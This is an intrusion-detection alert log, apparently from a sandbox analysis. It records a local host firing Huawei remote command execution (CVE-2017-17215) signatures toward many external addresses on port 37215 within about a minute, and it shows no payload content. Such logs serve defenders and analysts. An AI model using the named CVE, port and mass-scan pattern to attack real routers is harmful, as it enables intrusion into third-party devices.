                                            06/14/24-10:43:34.676103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935237215192.168.2.14156.150.23.167
                                            06/14/24-10:43:58.277939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031837215192.168.2.14197.136.102.70
                                            06/14/24-10:44:00.322943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489237215192.168.2.1441.162.226.83
                                            06/14/24-10:44:12.644139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360437215192.168.2.14156.121.60.38
                                            06/14/24-10:43:37.761950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070237215192.168.2.14156.150.62.189
                                            06/14/24-10:43:48.018274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640637215192.168.2.14156.131.205.153
                                            06/14/24-10:44:08.505163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842637215192.168.2.1441.200.10.214
                                            06/14/24-10:43:34.661523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496637215192.168.2.1441.145.71.139
                                            06/14/24-10:44:14.687257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750437215192.168.2.1441.126.6.43
                                            06/14/24-10:44:27.001653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259637215192.168.2.14197.200.19.104
                                            06/14/24-10:44:18.776945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666637215192.168.2.14156.188.243.158
                                            06/14/24-10:43:58.277463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165237215192.168.2.1441.205.128.95
                                            06/14/24-10:44:02.368343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294437215192.168.2.1441.88.169.138
                                            06/14/24-10:44:33.149822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957437215192.168.2.1441.111.0.232
                                            06/14/24-10:44:04.419531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675637215192.168.2.14156.4.134.182
                                            06/14/24-10:44:31.088657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160437215192.168.2.14156.6.224.74
                                            06/14/24-10:44:00.343565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832437215192.168.2.14197.156.126.136
                                            06/14/24-10:44:24.916017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590637215192.168.2.1441.107.223.2
                                            06/14/24-10:44:10.544317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788637215192.168.2.14197.243.120.27
                                            06/14/24-10:44:04.421875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844637215192.168.2.14197.113.144.80
                                            06/14/24-10:43:58.293709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089837215192.168.2.14197.208.164.14
                                            06/14/24-10:44:35.182228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600637215192.168.2.14156.62.32.40
                                            06/14/24-10:44:12.618104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158037215192.168.2.14197.4.48.111
                                            06/14/24-10:44:08.520344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036837215192.168.2.1441.80.38.206
                                            06/14/24-10:44:06.469865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587437215192.168.2.14156.188.24.35
                                            06/14/24-10:44:22.881625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840237215192.168.2.14156.202.21.10
                                            06/14/24-10:43:36.727963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022837215192.168.2.14197.118.158.162
                                            06/14/24-10:43:34.661880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142437215192.168.2.14156.92.179.212
                                            06/14/24-10:44:35.179684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734837215192.168.2.14156.100.117.38
                                            06/14/24-10:43:52.159957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618237215192.168.2.14197.117.230.15
                                            06/14/24-10:43:39.792777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545437215192.168.2.14197.141.166.233
                                            06/14/24-10:43:41.910587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5506637215192.168.2.1441.180.82.4
                                            06/14/24-10:43:45.984682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078837215192.168.2.14156.106.239.77
                                            06/14/24-10:44:33.151533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169237215192.168.2.14156.111.205.3
                                            06/14/24-10:44:20.805967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6009237215192.168.2.14197.169.116.106
                                            06/14/24-10:44:22.882201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845437215192.168.2.1441.92.23.88
                                            06/14/24-10:44:24.917467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315437215192.168.2.14156.80.11.97
                                            06/14/24-10:43:39.812099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296837215192.168.2.1441.210.22.93
                                            06/14/24-10:43:45.968926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000837215192.168.2.1441.154.28.210
                                            06/14/24-10:43:52.159290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621237215192.168.2.1441.243.92.93
                                            06/14/24-10:44:04.423682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4691637215192.168.2.14197.115.103.36
                                            06/14/24-10:43:58.291701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969837215192.168.2.14156.192.118.226
                                            06/14/24-10:44:26.980180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327437215192.168.2.14156.174.67.98
                                            06/14/24-10:43:48.021720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656637215192.168.2.14197.168.9.24
                                            06/14/24-10:43:48.031208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353637215192.168.2.14156.47.139.32
                                            06/14/24-10:43:58.293748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441437215192.168.2.1441.239.179.29
                                            06/14/24-10:44:29.013445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828437215192.168.2.14156.29.139.6
                                            06/14/24-10:44:14.672146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432437215192.168.2.14156.196.43.68
                                            06/14/24-10:43:43.968864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983237215192.168.2.1441.203.73.23
                                            06/14/24-10:43:41.850643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997037215192.168.2.14156.129.8.36
                                            06/14/24-10:43:50.071204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097437215192.168.2.14156.237.210.121
                                            06/14/24-10:43:56.227238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288037215192.168.2.14197.35.237.7
                                            06/14/24-10:43:39.791204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650837215192.168.2.1441.241.223.81
                                            06/14/24-10:44:18.761552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403037215192.168.2.14156.49.132.45
                                            06/14/24-10:44:10.542634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427037215192.168.2.14197.101.18.62
                                            06/14/24-10:44:22.861712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815037215192.168.2.14197.27.158.11
                                            06/14/24-10:43:52.165160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316037215192.168.2.14197.62.96.247
                                            06/14/24-10:43:52.148717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701837215192.168.2.1441.205.95.67
                                            06/14/24-10:43:37.762619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868837215192.168.2.14197.72.136.48
                                            06/14/24-10:43:54.182427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614437215192.168.2.1441.44.41.209
                                            06/14/24-10:43:36.722507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454237215192.168.2.14197.182.25.170
                                            06/14/24-10:43:52.159906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093837215192.168.2.1441.62.98.84
                                            06/14/24-10:44:02.382051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381837215192.168.2.14156.54.214.167
                                            06/14/24-10:44:16.734915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627237215192.168.2.14197.62.63.225
                                            06/14/24-10:43:36.718571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379837215192.168.2.14156.154.140.211
                                            06/14/24-10:44:06.472883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971637215192.168.2.14197.231.17.177
                                            06/14/24-10:44:31.094290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199437215192.168.2.14197.58.122.75
                                            06/14/24-10:43:58.276723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247237215192.168.2.1441.193.80.138
                                            06/14/24-10:44:20.828866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895637215192.168.2.14197.18.252.103
                                            06/14/24-10:43:50.115019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317437215192.168.2.1441.104.212.91
                                            06/14/24-10:44:16.718465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386037215192.168.2.14156.54.105.150
                                            06/14/24-10:44:31.054893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591837215192.168.2.1441.253.207.145
                                            06/14/24-10:43:50.111878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356837215192.168.2.14156.124.69.50
                                            06/14/24-10:44:12.625432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906637215192.168.2.14197.211.38.117
                                            06/14/24-10:44:02.367363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.14156.178.185.161
                                            06/14/24-10:44:33.131805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280637215192.168.2.1441.53.7.93
                                            06/14/24-10:44:29.027242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574437215192.168.2.14156.109.31.91
                                            06/14/24-10:44:24.913558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612837215192.168.2.1441.231.46.226
                                            06/14/24-10:44:35.182821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392837215192.168.2.1441.246.178.58
                                            06/14/24-10:44:00.338883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528037215192.168.2.14197.247.108.202
                                            06/14/24-10:44:12.614540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381637215192.168.2.14197.181.197.88
                                            06/14/24-10:44:16.733309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644237215192.168.2.14197.55.182.53
                                            06/14/24-10:44:18.761492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669637215192.168.2.14197.93.171.60
                                            06/14/24-10:43:41.846347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726837215192.168.2.14156.77.120.44
                                            06/14/24-10:44:24.915483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222437215192.168.2.1441.255.66.156
                                            06/14/24-10:43:37.760871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030037215192.168.2.14156.175.177.129
                                            06/14/24-10:44:26.978431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040837215192.168.2.14156.163.210.244
                                            06/14/24-10:44:31.086204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785037215192.168.2.14197.64.12.171
                                            06/14/24-10:44:06.472851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557637215192.168.2.14197.196.156.208
                                            06/14/24-10:44:12.645500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070837215192.168.2.14156.112.141.212
                                            06/14/24-10:44:20.807252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065837215192.168.2.14197.214.220.216
                                            06/14/24-10:43:41.910398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3283637215192.168.2.14156.55.162.129
                                            06/14/24-10:43:45.968358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863437215192.168.2.14156.15.65.123
                                            06/14/24-10:44:00.341340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487837215192.168.2.14197.41.7.175
                                            06/14/24-10:43:56.242646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492437215192.168.2.14156.206.193.186
                                            06/14/24-10:43:36.705543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5299437215192.168.2.14156.85.17.57
                                            06/14/24-10:43:43.967219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310237215192.168.2.14156.100.237.184
                                            06/14/24-10:43:39.792382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126037215192.168.2.14197.111.80.225
                                            06/14/24-10:43:45.988020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010837215192.168.2.1441.254.173.105
                                            06/14/24-10:43:43.970681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932037215192.168.2.14197.248.128.206
                                            06/14/24-10:44:12.618729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433237215192.168.2.1441.220.45.54
                                            06/14/24-10:44:02.369296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498837215192.168.2.14156.180.6.79
                                            06/14/24-10:43:43.967396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986437215192.168.2.1441.82.202.58
                                            06/14/24-10:44:08.517693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922237215192.168.2.14156.16.9.249
                                            06/14/24-10:43:43.972359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894437215192.168.2.14156.188.25.245
                                            06/14/24-10:44:00.338532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309837215192.168.2.14197.167.120.33
                                            06/14/24-10:44:00.344197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925237215192.168.2.14197.229.145.186
                                            06/14/24-10:43:45.966394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536837215192.168.2.1441.88.141.154
                                            06/14/24-10:44:31.056602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530637215192.168.2.14156.198.68.209
                                            06/14/24-10:44:31.056707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300237215192.168.2.14156.55.28.79
                                            06/14/24-10:43:41.906521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4858637215192.168.2.1441.217.47.225
                                            06/14/24-10:44:20.806869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544437215192.168.2.14156.189.34.63
                                            06/14/24-10:43:58.289695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913237215192.168.2.14197.207.228.12
                                            06/14/24-10:43:48.018009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679037215192.168.2.14156.227.223.192
                                            06/14/24-10:43:58.293129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448037215192.168.2.14156.53.235.221
                                            06/14/24-10:43:54.201132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851637215192.168.2.1441.118.164.170
                                            06/14/24-10:43:58.277985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597437215192.168.2.14156.225.224.82
                                            06/14/24-10:44:22.880869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426037215192.168.2.14197.108.109.114
                                            06/14/24-10:43:48.032239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808637215192.168.2.14156.65.128.184
                                            06/14/24-10:43:41.846956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047637215192.168.2.14156.30.181.100
                                            06/14/24-10:44:18.763851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107237215192.168.2.14156.100.140.18
                                            06/14/24-10:44:35.180407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613637215192.168.2.14156.105.84.191
                                            06/14/24-10:43:52.147024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149037215192.168.2.14197.218.190.249
                                            06/14/24-10:43:48.046007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825237215192.168.2.14156.186.227.11
                                            06/14/24-10:43:41.906594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330237215192.168.2.14156.28.82.77
                                            06/14/24-10:44:06.451879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369637215192.168.2.14156.145.186.66
                                            06/14/24-10:43:48.032120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754437215192.168.2.14156.241.184.71
                                            06/14/24-10:44:08.504737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369237215192.168.2.14197.159.246.142
                                            06/14/24-10:44:08.505191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493437215192.168.2.1441.14.7.71
                                            06/14/24-10:44:16.718162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874837215192.168.2.14197.49.41.145
                                            06/14/24-10:44:33.133502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230437215192.168.2.1441.178.244.171
                                            06/14/24-10:44:29.013027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936837215192.168.2.14197.208.61.37
                                            06/14/24-10:43:45.969151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644037215192.168.2.14156.192.255.142
                                            06/14/24-10:44:04.423754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025437215192.168.2.1441.112.35.176
                                            06/14/24-10:44:08.502301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3276837215192.168.2.14156.136.219.76
                                            06/14/24-10:44:16.717023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351437215192.168.2.1441.30.194.62
                                            06/14/24-10:43:39.791934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585637215192.168.2.1441.7.38.149
                                            06/14/24-10:44:20.805844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569837215192.168.2.14197.98.120.102
                                            06/14/24-10:43:43.944661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093237215192.168.2.14197.90.195.108
                                            06/14/24-10:43:43.971311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116837215192.168.2.14197.82.112.167
                                            06/14/24-10:44:20.807048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317637215192.168.2.14197.232.14.220
                                            06/14/24-10:44:04.424304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457237215192.168.2.1441.245.15.167
                                            06/14/24-10:44:26.999807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894037215192.168.2.14156.147.154.213
                                            06/14/24-10:44:35.179287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948237215192.168.2.14156.194.247.0
                                            06/14/24-10:44:18.766637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811437215192.168.2.14197.13.252.48
                                            06/14/24-10:44:33.134223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876637215192.168.2.14156.84.230.233
                                            06/14/24-10:43:48.033865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915437215192.168.2.14197.175.144.218
                                            06/14/24-10:43:39.811710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199437215192.168.2.14197.162.192.42
                                            06/14/24-10:44:22.881950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600437215192.168.2.14156.89.107.70
                                            06/14/24-10:44:12.644502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452037215192.168.2.14197.212.30.25
                                            06/14/24-10:44:33.152634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740237215192.168.2.14156.212.145.228
                                            06/14/24-10:44:20.829840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944037215192.168.2.14156.49.6.50
                                            06/14/24-10:44:31.092919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764837215192.168.2.14197.74.172.110
                                            06/14/24-10:44:04.409995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137437215192.168.2.14156.253.19.243
                                            06/14/24-10:43:41.896393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058237215192.168.2.1441.26.203.87
                                            06/14/24-10:43:34.663486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437437215192.168.2.1441.150.127.110
                                            06/14/24-10:43:43.943047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601237215192.168.2.14197.166.36.132
                                            06/14/24-10:43:50.111774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258237215192.168.2.14156.17.90.197
                                            06/14/24-10:43:45.985001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490437215192.168.2.14197.220.63.107
                                            06/14/24-10:44:00.324864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582837215192.168.2.1441.95.156.9
                                            06/14/24-10:43:54.198852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924037215192.168.2.14156.252.49.143
                                            06/14/24-10:44:35.178242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113437215192.168.2.14197.105.79.179
                                            06/14/24-10:43:45.985397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826037215192.168.2.1441.167.212.244
                                            06/14/24-10:43:58.273822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709037215192.168.2.14156.72.173.8
                                            06/14/24-10:44:08.504616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286637215192.168.2.1441.23.6.63
                                            06/14/24-10:43:48.029408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413037215192.168.2.14197.81.227.45
                                            06/14/24-10:43:39.792668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531637215192.168.2.1441.253.125.109
                                            06/14/24-10:44:00.324556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139037215192.168.2.1441.25.196.22
                                            06/14/24-10:44:10.546143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734237215192.168.2.1441.198.237.112
                                            06/14/24-10:44:10.564805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523237215192.168.2.14197.162.219.233
                                            06/14/24-10:44:06.471750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110437215192.168.2.1441.35.125.202
                                            06/14/24-10:44:08.503033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066637215192.168.2.1441.255.117.117
                                            06/14/24-10:44:31.053230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467037215192.168.2.1441.192.191.239
                                            06/14/24-10:44:24.916644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940437215192.168.2.14197.89.175.36
                                            06/14/24-10:44:33.133241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976037215192.168.2.14197.151.33.241
                                            06/14/24-10:44:20.827653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688237215192.168.2.14156.118.153.126
                                            06/14/24-10:44:04.419487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576237215192.168.2.1441.36.87.66
                                            06/14/24-10:44:29.010699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585237215192.168.2.14197.195.227.182
                                            06/14/24-10:43:37.759486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483237215192.168.2.14197.191.116.64
                                            06/14/24-10:44:22.860585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294237215192.168.2.14197.132.190.72
                                            06/14/24-10:44:16.735415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638237215192.168.2.1441.163.162.179
                                            06/14/24-10:43:36.701150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154637215192.168.2.14197.12.116.6
                                            06/14/24-10:44:10.549232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485437215192.168.2.14197.209.104.18
                                            06/14/24-10:43:58.295530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5884237215192.168.2.14156.179.154.204
                                            06/14/24-10:43:34.678853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506637215192.168.2.14156.115.89.207
                                            06/14/24-10:43:36.700306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926037215192.168.2.1441.43.246.92
                                            06/14/24-10:43:56.229537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806437215192.168.2.1441.113.123.249
                                            06/14/24-10:43:39.811425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884437215192.168.2.1441.232.229.67
